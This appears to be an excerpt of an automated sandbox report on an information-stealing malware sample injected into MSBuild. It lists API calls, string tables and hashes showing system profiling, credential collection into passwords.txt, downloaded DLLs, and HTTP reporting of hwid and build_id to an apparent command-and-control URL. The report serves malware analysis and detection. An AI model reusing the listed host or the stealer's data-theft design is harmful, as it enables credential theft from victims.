Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
Part of subcall function 00411203: RegCloseKey.ADVAPI32(?), ref: 00411446
Part of subcall function 00411203: RegCloseKey.ADVAPI32(?), ref: 00411472

lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000), ref: 00414563

Part of subcall function 00416FA7: CreateThread.KERNEL32(00000000,00000000,00416ED6,?,00000000,00000000), ref: 00417046
Part of subcall function 00416FA7: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 0041704E

Strings

Local Time: , xrefs: 0041414B
VideoCard: , xrefs: 004143B7
TimeZone: , xrefs: 004141AC
Windows: , xrefs: 00413E70
Install Date: , xrefs: 00413ED1
RAM: , xrefs: 00414350
Computer Name: , xrefs: 00413FAD
MachineID: , xrefs: 00413C80
Cores: , xrefs: 0041428E
Path: , xrefs: 00413DBB
GUID: , xrefs: 00413CE1
[Hardware], xrefs: 0041420D
Work Dir: In memory, xrefs: 00413E30
HWID: , xrefs: 00413D4E
[Processes], xrefs: 0041442A
User Name: , xrefs: 0041400E
information.txt, xrefs: 00414573
Date: , xrefs: 00413C1F
Version: , xrefs: 00413B9F
AV: , xrefs: 00413F3E
Processor: , xrefs: 0041422D
[Software], xrefs: 004144A3
Display Resolution: , xrefs: 0041406F
Threads: , xrefs: 004142EF
Keyboard Languages: , xrefs: 004140DE

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$AllocateCharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
API String ID: 3634126619-1014693891
Opcode ID: 7a46959f5221a3ecf59d0b49526b51229a01ec7697e4ef637f3ce16e9305e42c
Instruction ID: 8a42f407c24202d7a6dd8fa6120b12fd45f2decad8a8e81766ce9a60c8fe54d8
Opcode Fuzzy Hash: 7a46959f5221a3ecf59d0b49526b51229a01ec7697e4ef637f3ce16e9305e42c
Instruction Fuzzy Hash: EB527D71D4001EAACF01FBA2DD429DDB7B5AF04308F51456BB610771A1DBB87E8E8B98

Function 004169B6 Relevance: 45.8, APIs: 9, Strings: 17, Instructions: 315
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417284,004366CF,004366CE,?,?,?,?,0041869F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417284,004366CF,004366CE,?,?,?,?,0041869F), ref: 00410581

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 0041683E: StrCmpCA.SHLWAPI(?,ERROR), ref: 00416873

StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AC2

Part of subcall function 004168C6: StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416925
Part of subcall function 004168C6: StrStrA.SHLWAPI(00000000,?), ref: 0041693A
Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416949
Part of subcall function 004168C6: lstrlenA.KERNEL32(00000000), ref: 00416962

StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B1F
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B78
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BD8
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416C31
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416C47
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416CA7
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416D00
Sleep.KERNEL32(0000EA60), ref: 00416D0F

Strings

>wA, xrefs: 00416E2D
ERROR, xrefs: 00416ABA
ERROR, xrefs: 00416B17
ERROR, xrefs: 00416C29
ERROR, xrefs: 00416BD0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0, xrefs: 00416D8D
ERROR, xrefs: 00416CF8
sqlp.dll, xrefs: 00416DAC
http://proxy.johnmccrea.com/, xrefs: 00416A54
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0, xrefs: 00416DBE
ERROR, xrefs: 00416C3F
sqlp.dll, xrefs: 00416D44
sql.dll, xrefs: 00416E0E
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0, xrefs: 00416D25
sqlp.dll, xrefs: 00416DDD
ERROR, xrefs: 00416C9F
ERROR, xrefs: 00416B70

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: >wA$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$http://proxy.johnmccrea.com/$sql.dll$sqlp.dll$sqlp.dll$sqlp.dll
API String ID: 507064821-4142071343
Opcode ID: d6a0b5c5444a4ccf3efbfa7656036f48e37d140efc54fa1caf20e42d6c103a14
Instruction ID: c90f6ea4a5ca348140cab4ba7e9dbaa9ca4af95923ca0130c421cdf06f76cfec
Opcode Fuzzy Hash: d6a0b5c5444a4ccf3efbfa7656036f48e37d140efc54fa1caf20e42d6c103a14
Instruction Fuzzy Hash: 0FC15C31E40118ABCF10FB66DD47ACCB775AF04308F51406BF815B7192DBB8AE898B99

Function 0040884C Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 405
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410795: StrCmpCA.SHLWAPI(?,?,?,00408863,?,?,?), ref: 0041079E

CopyFileA.KERNEL32(?,?,00000001), ref: 00408941

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 004122B0: _memset.LIBCMT ref: 004122D7
Part of subcall function 004122B0: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
Part of subcall function 004122B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
Part of subcall function 004122B0: CloseHandle.KERNEL32(00000000), ref: 00412392

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408AA6
RtlAllocateHeap.NTDLL(00000000), ref: 00408AAD
StrCmpCA.SHLWAPI(?,ERROR_RUN_EXTRACTOR), ref: 00408B95
StrCmpCA.SHLWAPI(?,004371E8), ref: 00408BAB
StrCmpCA.SHLWAPI(?,004371EC), ref: 00408BD3
lstrlenA.KERNEL32(?), ref: 00408CF0
lstrlenA.KERNEL32(?), ref: 00408D0B

Part of subcall function 00416FA7: CreateThread.KERNEL32(00000000,00000000,00416ED6,?,00000000,00000000), ref: 00417046
Part of subcall function 00416FA7: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 0041704E

DeleteFileA.KERNEL32(?), ref: 00408D4E

Strings

ERROR_RUN_EXTRACTOR, xrefs: 00408B8F

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
String ID: ERROR_RUN_EXTRACTOR
API String ID: 2819533921-2709115261
Opcode ID: 077028fa3e716a35bf32b89dafc6fd792268f45b4b1644074680612183489aa6
Instruction ID: b1bb328f08e938e4400443fd48ceaf11af5fc61e9b4d8feda928490e573589d9
Opcode Fuzzy Hash: 077028fa3e716a35bf32b89dafc6fd792268f45b4b1644074680612183489aa6
Instruction Fuzzy Hash: 02E14F71A00209AFCF01FFA1ED4A9DD7B76AF04309F10502AF541B71A1DB796E958F98

Function 0040852E Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 230
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001), ref: 004085D3
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408628
RtlAllocateHeap.NTDLL(00000000), ref: 0040862F
lstrlenA.KERNEL32(?), ref: 004086CB
lstrcatA.KERNEL32(?), ref: 004086E4
lstrcatA.KERNEL32(?,?), ref: 004086EE
lstrcatA.KERNEL32(?,0043719C), ref: 004086FA
lstrcatA.KERNEL32(?,?), ref: 00408704
lstrcatA.KERNEL32(?,004371A0), ref: 00408710
lstrcatA.KERNEL32(?), ref: 0040871D
lstrcatA.KERNEL32(?,?), ref: 00408727
lstrcatA.KERNEL32(?,004371A4), ref: 00408733
lstrcatA.KERNEL32(?), ref: 00408740
lstrcatA.KERNEL32(?,?), ref: 0040874A
lstrcatA.KERNEL32(?,004371A8), ref: 00408756
lstrcatA.KERNEL32(?), ref: 00408763
lstrcatA.KERNEL32(?,?), ref: 0040876D
lstrcatA.KERNEL32(?,004371AC), ref: 00408779
lstrcatA.KERNEL32(?,004371B0), ref: 00408785
lstrlenA.KERNEL32(?), ref: 004087BE
DeleteFileA.KERNEL32(?), ref: 0040880B

Strings

passwords.txt, xrefs: 004087CE

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID: passwords.txt
API String ID: 1956182324-347816968
Opcode ID: 0425c30be70ca39626462c834c4dfe654db9ea7e380ceb02c86be48175c27a70
Instruction ID: dc35adcabb2262aeaa3715ac701fce149c27e2d4e5217412d5f4b6884cb75f27
Opcode Fuzzy Hash: 0425c30be70ca39626462c834c4dfe654db9ea7e380ceb02c86be48175c27a70
Instruction Fuzzy Hash: E2814032900208AFCF05FFA1EE4A9CD7B76BF08316F205026F501B31A1EB7A5E559B59

Function 00404B2E Relevance: 35.4, APIs: 12, Strings: 8, Instructions: 378
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
StrCmpCA.SHLWAPI(?), ref: 00404BEB
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404D83
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00404DC7
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404DF5

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

lstrlenA.KERNEL32(?,00436953,",build_id,004377C4,------,004377B8,",hwid,004377A4,------), ref: 004050EE
lstrlenA.KERNEL32(?,?,00000000), ref: 00405101
HttpSendRequestA.WININET(00000000,?,00000000), ref: 0040510F
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C
InternetCloseHandle.WININET(00000000), ref: 00405177
InternetCloseHandle.WININET(?), ref: 0040518E
InternetCloseHandle.WININET(?), ref: 0040519A

Strings

hwid, xrefs: 00404EAD
HxA, xrefs: 00405222
", xrefs: 00404ED9
------, xrefs: 00404F5B
build_id, xrefs: 0040500D
------, xrefs: 00404DFB
------, xrefs: 00404C75
", xrefs: 00405039

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
String ID: "$"$------$------$------$HxA$build_id$hwid
API String ID: 3006978581-3648483202
Opcode ID: 3e75520d421d15d17480e17177354ca7258db6304e7740180cb8297fdc3c51f4
Instruction ID: 21305393b516d721eabc2380545c4b93fc8e403c2138cad973479bd5099e6fae
Opcode Fuzzy Hash: 3e75520d421d15d17480e17177354ca7258db6304e7740180cb8297fdc3c51f4
Instruction Fuzzy Hash: 0C02C371D5512A9ACF20EB21CD46ADDB7B5FF04308F4140E6A54873191DAB87ECA8FD8

Function 00401666 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129memoryfileCOMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00401696
wsprintfW.USER32 ref: 004016BC
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004016E6
GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
RtlAllocateHeap.NTDLL(00000000), ref: 00401705
_time64.MSVCRT ref: 0040170E
srand.MSVCRT ref: 00401715
rand.MSVCRT ref: 0040171E
_memset.LIBCMT ref: 0040172E
WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
_memset.LIBCMT ref: 00401763
CloseHandle.KERNEL32(?), ref: 00401771
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
_memset.LIBCMT ref: 004017BE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
RtlFreeHeap.NTDLL(00000000), ref: 004017CF
CloseHandle.KERNEL32(?), ref: 004017DB

Strings

%s%s, xrefs: 004016B6
delays.tmp, xrefs: 004016A4

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
String ID: %s%s$delays.tmp
API String ID: 1620473967-1413376734
Opcode ID: 39f734473f17f97426e056466eb3bebedc037311c24c273f22620d7e2f0f990d
Instruction ID: 9b5f552432b4e98a6f0c5797751fefc193ccc8af765751ef1568987e4d70ee72
Opcode Fuzzy Hash: 39f734473f17f97426e056466eb3bebedc037311c24c273f22620d7e2f0f990d
Instruction Fuzzy Hash: B641C6B1D00218ABDB205F61AC4CF9F7B7DEB85715F1016BAF00AE10A1DA394E54CF28

Function 00411807 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 143memorycomtimeCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 0041180E
CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
VariantInit.OLEAUT32(?), ref: 004118DB

Part of subcall function 00411757: __EH_prolog3_catch.LIBCMT ref: 0041175E
Part of subcall function 00411757: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043B018,?,00000018,00411901,?), ref: 00411781
Part of subcall function 00411757: SysAllocString.OLEAUT32(?), ref: 0041178E
Part of subcall function 00411757: _wtoi64.MSVCRT ref: 004117C1
Part of subcall function 00411757: SysFreeString.OLEAUT32(?), ref: 004117DA
Part of subcall function 00411757: SysFreeString.OLEAUT32(00000000), ref: 004117E1

FileTimeToSystemTime.KERNEL32(?,?), ref: 0041190A
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411916
HeapAlloc.KERNEL32(00000000), ref: 0041191D
VariantClear.OLEAUT32(?), ref: 0041195C
wsprintfA.USER32 ref: 00411949

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Strings

Unknown, xrefs: 00411985
ROOT\CIMV2, xrefs: 00411862
Unknown, xrefs: 00411971
%d/%d/%d %d:%d:%d, xrefs: 00411943
Select * From Win32_OperatingSystem, xrefs: 00411895
Unknown, xrefs: 0041196A
InstallDate, xrefs: 004118ED
WQL, xrefs: 0041189A

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
API String ID: 2280294774-461178377
Opcode ID: 4a998e0831886b93ed92c0276ff9e06964fee6d6e5f1487c865c121be33c5c48
Instruction ID: 99ef6883476e7e72b4c9cbd85dd5ecdaeb76e40d083b236b73c3eff291e47a74
Opcode Fuzzy Hash: 4a998e0831886b93ed92c0276ff9e06964fee6d6e5f1487c865c121be33c5c48
Instruction Fuzzy Hash: 49416C71940209BBCB10DBD5DC89EEFBBBDEB89B11F20411AF611A6190D6799941CB38

Function 004164BD Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 114stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004164E2

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

